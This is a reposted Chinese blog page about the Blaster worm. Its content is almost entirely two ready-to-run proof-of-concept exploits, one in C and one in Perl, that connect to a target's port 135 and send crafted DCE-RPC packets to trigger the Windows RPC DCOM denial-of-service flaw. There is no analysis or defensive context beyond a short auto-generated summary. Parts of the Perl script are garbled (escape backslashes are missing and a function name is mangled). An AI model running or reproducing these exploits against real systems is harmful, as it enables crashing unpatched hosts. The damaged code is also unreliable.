冲击波病毒内幕点滴（2） (转)

转载于 2007-08-16 17:25:49 发布 · 75 阅读

·

0

·

文章标签：

本文提供了一段用于测试RPC漏洞的C语言代码示例，该漏洞曾被冲击波病毒利用。代码展示了如何通过TCP连接到目标主机的135端口并发送特定的数据包以触发潜在的安全问题。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

冲击波病毒内幕点滴（2） (转)[@more@]

附1XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:office" />

测试代码

#include

#include

#include

#include

#include

#include

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,

0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,

0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};

void main(int argc,char ** argv)

{

WSADATA WSAData;

int i;

SOCKET sock;

SOCKADDR_IN addr_in;

short port=135;

unsigned char buf1[0x1000];

printf("RPC Dcom Dos Vulnerability diSCOveried by Xfocus.org ");

printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org ");

printf("Welcome to http://www.xfocus.NET ");

if(argc<2)

{

printf("useage:%s target ",argv[0]);

exit(1);

}

if (WSAStartup(MAKEword(2,0),&WSAData)!=0)

{

printf("WSAStartup error.Error:%d ",WSAGetLastError());

return;

}

addr_in.sin_family=AF_INET;

addr_in.sin_port=htons(port);

addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

{

printf("Socket failed.Error:%d ",WSAGetLastError());

return;

}

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)

{

printf("Connect failed.Error:%d",WSAGetLastError());

return;

}

if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d ",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)

{

printf("Send failed.Error:%d ",WSAGetLastError());

return;

}

i=recv(sock,buf1,1024,MSG_PEEK);

}

#!/usr/bin/perl -w

# By SecurITeam's Experts

my $bindstr = "x05x00x0Bx03x10x00x00x00x48x00x00x00x7Fx00x00x00xD0x16xD0x16x00x00x00x00x01x00x00x00x01x00x01x00xA0x01x00x00x00x00x00x00xC0x00x00x00x00x00x00x46x00x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";

my $request = "x05x00x00x03x10x00x00x00x48x00x00x00x13x00x00x00x90x00x00x00x01x00x03x00x05x00x06x01x00x00x00x00x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x31x00x00x00x00x00x00x00x00";

use Socket;

$proto = getprotobyname('tcp');

socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems ");

$ip = $ARGV[0];

$target = .net_aton($IP);

$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;

sleep(2);

select(STDOUT);

close(S);

来自 “ ITPUB博客 ” ，链接：http://blog.itpub.net/10752043/viewspace-962280/，如需转载，请注明出处，否则将追究法律责任。

转载于:http://blog.itpub.net/10752043/viewspace-962280/

评论

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。